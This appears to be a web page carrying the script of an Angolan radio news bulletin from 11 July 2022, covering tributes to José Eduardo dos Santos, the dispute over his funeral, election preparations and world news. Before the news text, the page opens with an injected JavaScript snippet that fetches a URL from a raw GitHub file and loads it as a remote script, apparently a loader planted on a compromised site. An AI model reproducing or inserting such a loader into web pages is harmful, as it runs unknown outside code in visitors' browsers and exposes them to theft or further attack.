;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Hora Informativa, edição de 11 de Julho de 2022 | RadioPlayDigital
Hora Informativa, edição de 11 de Julho de 2022

Angola chora e continua a homenagear José Eduardo dos Santos

Antiga Primeira-dama da República Maria Eugênia Neto pede bom senso da família para que o enterro seja realizado em Luanda

Isabel dos Santos admite funeral em Angola mas só depois das eleições

CNE começou a formar agentes eleitorais que estarão nas Assembleias de Voto no dia 24 de Agosto.

Abertura da FILDA sofre alteração de 12 para 16 de Julho

Cabo Verde espera campanha agrícola mais chuvosa dos últimos cinco anos

População mundial pode chegar aos 8 mil milhões em novembro deste ano.

Mundo assinala hoje o dia da População

Ponto-Forte

24 graus de máxima e 19 de mínima é a temperatura prevista para esta segunda-feira em Luanda. Marcamos o tempo na notícia

Edita o José Silva com montagem de Anacleto José e técnica final de Alexandre Campos. Hora Informativa na LAC é com o Pedro Fernandes.

Boa noite,

…..

Ponto-JES-Patriota

……

Os angolanos continuam a homenagear, José Eduardo dos Santos, o ex-presidente da República, 

O homem que faleceu aos 79 anos, na última sexta-feira, vítima de doença em Barcelona, Espanha, e que queria ser recordado como um Bom Patriota.

As cerimónias oficiais decorrem na Praça da República, adjacente ao Memorial Doutor António Agostinho Neto, em Luanda, e um pouco por todo o país.

O Presidente da República, João Lourenço, deu início as homenagens com a assinatura no livro de condolências que se encontra no local.

“Neste momento de dor e consternação os angolanos choram o Presidente José Eduardo dos Santos, que nos momentos mais críticos do país, entregou-se por inteiro na defesa da Independência e da Soberania Nacional”, escreveu o estadista.

Para João Lourenço, o país verga-se e honra “a sua memória, defendendo a sua maior obra, a Paz e a Reconciliação Nacional”.

A mensagem termina com a manifestação dos “mais profundos sentimentos de pesar” à família enlutada.

Estiveram ainda na manhã de hoje, na Praça da República, o Presidente da Assembleia Nacional, Fernando da Piedade Dias dos Santos, ministros e magistrados do Ministério Público.

O Presidente da Assembleia Nacional, Fernando da Piedade Dias dos Santos, destacou em meio a tristeza, o legado de José Eduardo dos Santos.

RD-FPDSantos

Presidente da Assembleia Nacional, Fernando da Piedade Dias dos Santos.

Depois das entidades, no período da tarde, a cerimonia foi aberta à todos os cidadãos interessados em homenagear José Eduardo dos Santos.

Jornalista José Silva

……

RD-JSilva

……

Jornalista LAC José Silva

Angola chora e continua a homenagear José Eduardo dos Santos.

Maria Eugênia Neto, antiga Primeira-Dama da República, também esteve junto do local onde repousa a urna com os restos mortais do primeiro presidente de Angola, António Agostinho Neto.

Eugênia Neto ressalta José Eduardo dos Santos, como o homem da paz.

……

RD-MENeto 1

……

Homenagens oficiais em Luanda……quando em Barcelona Espanha, continuam as negociações entre a missão do governo e a família, para que cheguem a entendimento sobre a possível a transladação dos restos mortais do antigo estadista ao país.

A antiga Primeira-dama da República Maria Eugênia Neto pede bom senso da família para que o enterro seja realizado em Luanda.

….

RD-MENeto 2

…..

Maria Eugênia Neto, viúva de António Agostinho Neto, e a homenagem ao sucessor do seu esposo.

….

E nas negociações sobre a transladação dos restos mortais de José Eduardo dos Santos, para o país.

A filha mais velha do ex-presidente, Isabel dos Santos, admite funeral em Angola mas só depois das eleições

Esta posição, segundo avança o jornal português Expresso, foi vincada por Isabel dos Santos à saída do primeiro encontro exploratório mantido ontem, na capital da Catalunha em sistema de vídeo-chamada, diante de uma delegação governamental chefiada pelo Ministro de Estado e Chefe da Casa Militar do Presidente da República, general Francisco Pereira Furtado.

As conversações iniciadas em consequência das desavenças instaladas no interior da família, de um lado a antiga Primeira-Dama Ana Paula dos Santos e do outro, os filhos mais velhos, decorrem em separado e contam também com a participação do Procurador-Geral da República, Hélder Pita Gróz.

Recordamos ainda que já foi autopsiado nesta segunda-feira o corpo de José Eduardo dos Santos. A informação é avançada pela agência de notícias France Press. 

A autópsia foi requerida pela filha Tchizé dos Santos por suspeitar das circunstâncias que levaram à morte do pai. 

Refira-se que equipa de advogados de Tchizé tinha denunciado no fim-de-semana a “pressão” do governo de Angola, que fez viajar para Barcelona vários dos seus membros, juntamente com o Procurador-Geral da Republica, para recolher o corpo do ex-presidente e celebrar um funeral de Estado em Angola.

Segundo a família, o ex-presidente terá manifestado o desejo de ser sepultado em Barcelona e, por isso, querem impedir que um possível funeral de Estado ocorra no país.

 

Lopo de Nascimento, primeiro-ministro, durante o mandato de Agostinho Neto, fez um apelo à família dos Santos, para que permita que seja feito um funeral de Estado.

RD-LNascimento

Lopo do Nascimento militante histórico do MPLA e que também exerceu cargos governativos na era José Eduardo dos Santos, que defende a realização do funeral no país.

…..

Entretanto, o vice-procurador geral da República, assegurou esta segunda-feira, que as filhas de José Eduardo dos Santos, em conflito com a Lei, podem entrar e sair do País nesta fase do óbito.

Mota Liz, falava aos jornalistas após prestar homenagem ao ex-presidente na Praça da República. 

“O Presidente José Eduardo dos Santos, apesar de ser da família, é património da Nação e é preciso que haja bom senso da família para não prejudicar aquilo que é da Nação. Nem se prendem pessoas em dias de óbito, a própria Lei exclui essa possibilidade. Mas a prisão não é o remédio, os seres humanos têm de conversar sempre”, disse o vice-procurador geral da República.

Questionado sobre como estão as negociações, Mota Liz assegurou que a PGR está a tratar directamente a questão e que pensa estar em bom caminho.

….

Uma situação para continuar a seguir, no meio da consternação, de luto e dor manifestada pelos angolanos e não só pela perda, do homem que dirigiu o país entre 1979 a 2017.

A presidente do Tribunal de Contas, Exalgina Gamboa, disse esta manhã durante as cerimoniais oficiais de homenagens, ter orgulho de ter feito parte do governo de José Eduardo dos Santos.

RD-EGamboa

Presidente do Tribunal de Contas, Exalgina Gamboa.

E o histórico militante do MPLA, Dino Matrosse, recordou hoje em declarações à Comercial, a convivência com JES, que data dos anos 50.

RD-DMatrosse

Dino Matross do MPLA, quando falava hoje à LAC.

O Partido no poder em Angola, o MPLA, também homenageou hoje de manhã, o seu presidente emérito, no decorrer de uma cerimónia orientada pelo actual líder, João Lourenço.

Também assinaram o livro de honra na sede do MPLA, a vice-presidente Luísa Damião, o secretário-geral Paulo Pombolo e outros membros da Direcção do Partido.

…..

E noutras reacções à morte do ex-presidente da República.

O jurista e antigo primeiro-ministro, Marcolino Moco, disse hoje à LAC, ter ficado chocado com a notícia, apesar de ser uma situação previsível.

RD-MMoco1

Marcolino Moco diz que é hora de pôr em prática o perdão.

RD-MMoco 3

Antigo primeiro ministro de Angola, Marcolino José Carlos Moco, em declarações hoje à LAC à propósito do falecimento do presidente, José Eduardo dos Santos.

E neste terceiro dia de luto nacional, continua a decorrer a homenagem pública a José Eduardo dos Santos até as 20 horas. Cerimónias que devem decorrer até a próxima sexta-feira.

E contemporâneos de José Eduardo dos Santos não escondem o sentimento de admiração que nutrem pelas qualidades humanas e políticas do antigo presidente.

É o caso de Mateus Pereira Inglês, entrevistado pelo jornalista José Rodrigues da Comercial, que lembra episódios de convívio com José Eduardo dos Santos que remontam ao final da década de cinquenta, quando ambos, frequentavam a residência de um amigo comum, para aperfeiçoar os seus conhecimentos no domínio da viola de que o também líder histórico do MPLA, foi um exímio tocador.

…….

RD-MInglês 1

…….

Na vertente da política em que se destacou José Eduardo dos Santos na qualidade de dirigente máximo do país, durante aproximadamente quatro décadas, Mateus Pereira Inglês elogia as suas capacidades de governação, sobretudo em momentos dramáticos da vida dos angolanos, como foi a fase do conflito armado que terminou em 2002.

…….

RD-MInglês 2

……..

As memórias de Mateus Inglês, contemporâneo do antigo presidente da República, José Eduardo dos Santos, entrevistado pelo jornalista José Rodrigues da Comercial.

Continuam também as manifestações de pesar e mensagens um pouco por todo mundo.

O Papa Francisco enviou as suas condolências à família, autoridades e povo de Angola pela morte de José Eduardo dos Santos, recordando o antigo Presidente angolano como um “ilustre estadista”.

Em telegrama, Francisco endereça “cordial solidariedade” e recorda “o ilustre estadista que se destacou pela construção da pátria”.

O Papa, invoca de Deus omnipotente a paz eterna para a sua alma e abundantes dons divinos de consolação para quantos choram a sua morte, e de coragem incansável para todos os que trabalham em prol da unidade e do progresso da nação.

…..

Ponto-Morte

Angola chora e continua a homenagear José Eduardo dos Santos

O homem que faleceu aos 79 anos, na última sexta-feira, vítima de doença em Barcelona, Espanha, e que queria ser recordado com um Bom Patriota.

…..

Ponto-JES-Patriota

……

Ponto-Forte

…..

Daqui a pouco

CNE começa formação para mais de 105 agentes eleitorais que estarão as Assembleias de Voto no dia 24 de Agosto.

Vamos falar da FILDA-Feira Internacional de Luanda que sofreu um ligeiro adiamento

Presidente sul-africano Cyril Ramaphosa, pede detenção dos responsáveis pelos ataques armados que terão provocado 21 mortos.

…..

É para seguir a notícia no seu rádio ou no toque de um clique. Ouça a LAC nas plataformas digitais.

Ponto-LAC Internet

Publicidade

….

Começou nesta segunda-feira a formação de formadores nacionais para membros das mesas das Assembleias de Voto, nas eleições gerais de 24 de agosto.

A referida formação vai decorrer durante cinco dias na capital Luanda.

Trata-se de uma acção que pretende dotar os membros das mesas de voto de instrumentos para a realização do seu trabalho no dia do pleito eleitoral, onde terão a responsabilidade de organizar, dirigir e coordenar os trabalhos, como realça o porta-voz da Comissão Nacional Eleitoral (CNE), Lucas Quilundo.

…..

RD-LQuilundo 1

…….

A Comissão Nacional Eleitoral (CNE) prevê engajar acima de 100 mil membros, para trabalhar como agentes eleitorais, no país e no estrangeiro.

Daí que Lucas Quilundo sublinha a relevância desta formação.

…..

RD-LQuilundo 2

…..

Porta-voz da Comissão Nacional Eleitoral (CNE), Lucas Quilundo.

Eleições gerais de 24 de agosto vão contar com mais de treze mil assembleias de voto e constituídas por mais vinte seis e quatrocentas mesas no país e na diáspora.

O Tribunal Constitucional entrega, esta terça-feira, à Comissão Eleitoral Nacional (CNE) as listas definitivas das oito candidaturas validadas para as eleições gerais de 24 de Agosto próximo, em Angola.

Numa nota à imprensa, o Tribunal Constitucional precisa que a cerimónia de entrega terá lugar às 14:00 horas, no Palácio da Justiça, em Luanda.

Este acto representa a conclusão “com êxito” do processo de verificação e validação das candidaturas, após a convocação das eleições pelo Presidente da República, João Lourenço, a 03 de Junho passado, refere a nota do Tribunal.

Após a recepção das listas definitivas, a CNE deve organizar o sorteio para definir o posicionamento das candidaturas nos boletins de voto.

Foram apuradas todas as oito candidaturas que deram entrada no Tribunal Constitucional, entre 06 e 25 de Junho deste ano, sendo sete partidos políticos e uma coligação.

Trata-se, designadamente dos partidos MPLA, UNITA, PRS, FNLA, APN, PHA e P-NJANGO e da coligação CASA-CE, que viram aprovadas as suas propostas de candidatos à Presidência e Vice-Presidência da República e a deputados à Assembleia Nacional.

O Tribunal Constitucional publicou no fim-de-semana, as listas definitivas das oito candidaturas concorrentes às eleições gerais de 24 de Agosto.

Estão autorizados a concorrer ao pleito eleitoral no próximo mês, o MPLA, UNITA, CASA-CE, PRS, FNLA, APN, PHA, e P-NJANGO.

Assim está o país a caminho das quintas eleições da sua história

Vem aí a Festa do Voto

…..

Ponto-Eleições-CNE

Foi adiada a abertura da trigésima sétima edição da FILDA, Feira Internacional de Luanda, agendada para amanhã dia 12, na Zona Económica Especial Luanda-Bengo.

O adiamento da abertura da FILDA, deve-se ao Luto Nacional de sete dias que vigora desde sábado decretado pelo governo, em memória do ex-presidente José Eduardo dos Santos.

A abertura do certame anual que tem como lema para este ano, ‘As Tecnologias Disruptivas Como Factor de Desenvolvimento da Economia’, está agora marcada para o próximo dia 16 de Julho.

De 12 a 16 de Julho, era a data prevista para a edição da FILDA de 2022.

Ponto-Vector

A linha SOS criança registou nos últimos sete dias, quatrocentos e trinta e seis casos de violações dos direitos de menores.

Segundo Rosalina Domingos, do INAC, esses casos ocorreram um pouco por todo o país, e sobressaem os abusos sexuais, violência física e psicológica, trabalho infantil e fuga à responsabilidade parental.

Rosalina Neto particularizou a situação de menores em Luanda obrigados pelo pai, a trabalharem para o sustento da família.

RD-RDomingos1

A porta-voz do INAC relatou outras situações de abusos sexuais e instrumentalização de crianças, actos que são puníveis por lei.

RD-RDomingos2

Rosalina Domingos a porta- voz do Inac, sobre as denuncias recebidas nos últimos sete dias na Linha SOS Criança.

O Segundo Simpósio Internacional de Genética Humana, decorre em Luanda nos dias 13 e 14 de Julho, quarta e quinta-feira, sob o lema, ‘O Futuro da Genética em Angola’.

O evento, contará com a participação maioritária de especialistas angolanos, mas também estrangeiros, e decorrerá no auditório do hospital Cardeal Dom Alexandre do Nascimento, ex-Sanatório de Luanda.

E na véspera do acontecimento de cariz científico, a geneticista Madalena Chimpolo, disse à LAC que Angola precisa de ter um Plano Estratégico para bem da segurança nacional.

……

RD-MChimpolo 1

……

A pesquisadora pede mais apoios técnicos e financeiros para a concretização de projectos científicos que sejam decisivos para a detenção precoce de doenças crónicas como as cancerígenas, que se torna imperioso porque se assiste à transição da fase genética para a era genómica.

…….

RD-MChimpolo 2

…….

A geneticista Madalena Chimpolo, e a segunda edição do Simpósio Internacional de Genética Humana’ que Luanda acolhe esta semana, nos dias 13 e 14.

….

Publicidade

….

A Selecção Nacional sénior masculina de andebol derrotou esta segunda-feira a similar da Zâmbia, por 53-24, em jogo da primeira jornada do grupo D, do Campeonato Africano, que decorre no Egipto.

Na condição de favorita, Angola demonstrou o seu potencial do princípio ao fim do encontro.

A selecção nacional chegou ao intervalo em vantagem de 13 golos (24-11).

O “sete” nacional volta a jogar terça-feira, às 16h30, diante do Senegal..

…..

Horas…

Vamos agora saber como está o mundo nesta segunda-feira

O Presidente da África do Sul, Cyril Ramaphosa, instou as autoridades de segurança e as comunidades a cooperarem na detenção dos responsáveis pelos ataques armados em várias tabernas, no país, que provocaram pelo menos 21 mortos nas últimas 24 horas.

Num comunicado, o chefe de Estado sul-africano lamentou a ocorrência dos incidentes.

As autoridades dizem que estão à procura dos suspeitos que mataram várias pessoas em ataques nos últimos dias. Os sul-africanos estão indignados com a alta criminalidade registada no país e cobram medidas do Estado.

 

Vários  HYPERLINK “https://www.dw.com/pt-002/%C3%A1frica-do-sul-tiroteio-num-bar-provoca-21-mortos/a-62425640” ataques armados em diferentes localidades mataram pelo menos 21 pessoas no último fim-de-semana. Quinze pessoas morreram e nove ficaram feridas num ataque em Orlando East, logo nas primeiras horas da manhã de domingo.

Este ataque ocorreu poucas horas depois de um tiroteio semelhante, que deixou quatro mortos e oito feridos numa taberna numa zona, a 500 km do histórico bairro de Soweto, em Joanesburgo. 

….

As autoridades cabo-verdianas esperam que a campanha agrícola 2022/2023, que agora se inicia, seja a mais chuvosa dos últimos cinco anos, com as previsões meteorológicas a não descartarem a ocorrência de eventos extremos, foi hoje anunciado.

“Todas as previsões e mesmo o que se vê (…), e o clima também, está a mostrar que este ano poderá ser um ano melhor, pelo menos dos cinco últimos anos”, afirmou hoje, em conferência de imprensa, na Praia, a diretora-geral da Agricultura, Silvicultura e Pecuária de Cabo Verde, Eneida Rodrigues, durante a apresentação das medidas de preparação desta campanha agrícola.

A população mundial deve chegar aos 8 mil milhões de pessoas até 15 de novembro deste ano, de acordo com uma estimativa do Departamento de Assuntos Económicos e Sociais das Nações Unidas, hoje divulgada.

Segundo a projeção, a Índia ultrapassará a China, tornando-se o país mais populoso do mundo já em 2023.

As Nações Unidas assinalam hoje, 11 de julho, o Dia Mundial da População, que foi proclamado e adotado pela Assembleia-Geral da organização em 21 de dezembro de 1990.

“Antecipar o nascimento da pessoa que fará a população chegar aos 8 mil milhões na Terra”, é “um lembrete da nossa responsabilidade de cuidar do planeta e um momento para refletir como ainda estamos aquém nos nossos compromissos de uns para com os outros”, disse o secretário-geral da ONU, António Guterres, em comunicado, sem citar casos específicos.

O calendário para encontrar o sucessor de Boris Johnson na liderança do Partido Conservador e do governo britânico deve ser anunciado ainda hoje pelo grupo parlamentar.

 O chamado Comité de 1922, formado por deputados sem responsabilidades no governo, vai primeiro escolher uma nova direcção e depois estabelecer o calendário para o processo, com o objectivo de o Reino Unido ter um novo primeiro-ministro no início de Setembro.

Enquanto esta corrida para a liderança continua, Johnson permanece em funções, apesar de ter sido forçado a renunciar à liderança do Partido Conservador na quinta-feira passada devido à demissão em série de mais de 50 membros do próprio Executivo.  

De acordo com o jornal Daily Telegraph, o prazo para as candidaturas deverá fechar na terça-feira e a primeira volta de votação reservada aos deputados conservadores poderá realizar-se já na quarta-feira, seguindo-se mais rondas noutros dias até restarem apenas dois finalistas.  

Ponto

Recapitular

Fecho

Data de Emissão: 12-07-2022 às 19:00
Género(s): Noticiário
 
PUB RADIO PLAY

Relacionados